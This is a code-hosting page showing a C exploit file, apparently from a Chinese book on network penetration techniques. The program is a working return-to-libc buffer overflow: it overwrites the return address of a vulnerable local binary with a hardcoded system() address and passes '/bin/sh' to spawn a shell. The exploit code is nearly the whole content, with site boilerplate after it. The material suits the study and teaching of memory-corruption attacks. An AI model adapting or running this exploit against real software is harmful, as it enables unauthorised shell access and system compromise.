exp_e2.c

来自「网络渗透技术配书源码」· C语言代码 · 共 32 行

32 行

#include <stdio.h>

#define RET_POSITION                     260
#define NOP                            0x90
#define BUFADDR                         0xbffff978//0xbffff968
#define SYSTEM                  0x40058ae0
char shell[]="/bin/sh";                      /* .string \"/bin/sh\"   */

int main(int argc,char **argv)
{
        char buff[1024],*ptr;
        int retaddr;
        int i;

        retaddr=SYSTEM;
        if(argc>1)
                retaddr=SYSTEM+atoi(argv[1]);

        bzero(buff,1024);
        for(i=0;i<300;i++)
                buff[i]=NOP;
        *((long *)&(buff[RET_POSITION-4]))=BUFADDR+4*3+strlen(shell);
        *((long *)&(buff[RET_POSITION]))=retaddr;
        *((long *)&(buff[RET_POSITION+4]))=0xaabbccdd;//当system返回时候的eip
        *((long *)&(buff[RET_POSITION+8]))=BUFADDR+RET_POSITION+4*3;
        ptr=buff+RET_POSITION+12;
        strcpy(ptr,shell);
        printf("Jump to 0x%08x\n",retaddr);

        execl("./e2","e2",buff,0);
}

exp_e2.c - 源码说明

本页面展示了「网络渗透技术配书源码」中的 exp_e2.c 源码文件，采用 C语言编程语言编写，共 32 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫开发者社区收录了大量与网络安全相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C

搜索代码Ctrl + F

全屏模式F11

增大字号Ctrl + =

减小字号Ctrl + -

显示快捷键?